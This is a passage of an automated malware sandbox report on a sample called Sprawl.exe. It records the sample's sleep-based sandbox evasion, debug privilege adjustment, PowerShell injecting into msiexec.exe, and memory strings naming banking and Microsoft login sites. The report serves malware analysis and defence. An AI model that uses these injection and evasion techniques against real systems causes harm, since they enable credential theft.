            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -599108s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598999s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -598015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -597905s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -597796s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -597628s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -597476s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -597101s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596984s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596874s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596546s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596437s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596218s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -596000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -594906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -594797s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -594672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -594562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -594453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -594343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -594234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeFile Volume queried: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeFile Volume queried: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598905Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598647Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598305Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597748Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596504Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596261Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596132Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596011Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595754Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595530Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594499Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594265Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599648Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597905Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597628Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597476Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597101Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596874Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594234Jump to behavior
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3363263711.000000000704A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: msiexec.exe, 00000008.00000002.3362918549.00000000065D8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3362918549.000000000657A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\Sprawl.exeAPI call chain: ExitProcess graph end nodegraph_0-3247
            Source: C:\Users\user\Desktop\Sprawl.exeAPI call chain: ExitProcess graph end nodegraph_0-3400
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75892B rdtsc 2_2_0B75892B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D2DE58 LdrInitializeThunk,2_2_04D2DE58
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB6B mov edx, dword ptr fs:[00000030h]2_2_0B78EB6B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB63 mov edx, dword ptr fs:[00000030h]2_2_0B78EB63
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB53 mov edx, dword ptr fs:[00000030h]2_2_0B78EB53
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB4B mov edx, dword ptr fs:[00000030h]2_2_0B78EB4B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB43 mov edx, dword ptr fs:[00000030h]2_2_0B78EB43
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EB3B mov edx, dword ptr fs:[00000030h]2_2_0B78EB3B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EABC mov edx, dword ptr fs:[00000030h]2_2_0B78EABC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78BFF9 mov eax, dword ptr fs:[00000030h]2_2_0B78BFF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78EE66 mov ebx, dword ptr fs:[00000030h]2_2_0B78EE66
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED70 mov eax, dword ptr fs:[00000030h]2_2_0B78ED70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78B065 mov eax, dword ptr fs:[00000030h]2_2_0B78B065
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78C006 mov eax, dword ptr fs:[00000030h]2_2_0B78C006
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B78ED7E mov ebx, dword ptr fs:[00000030h]2_2_0B78ED7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BA18 mov ebx, dword ptr fs:[00000030h]2_2_0B75BA18
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B7642E3 mov eax, dword ptr fs:[00000030h]2_2_0B7642E3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75BF19 mov eax, dword ptr fs:[00000030h]2_2_0B75BF19
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75B41F mov eax, dword ptr fs:[00000030h]2_2_0B75B41F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 44C0000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
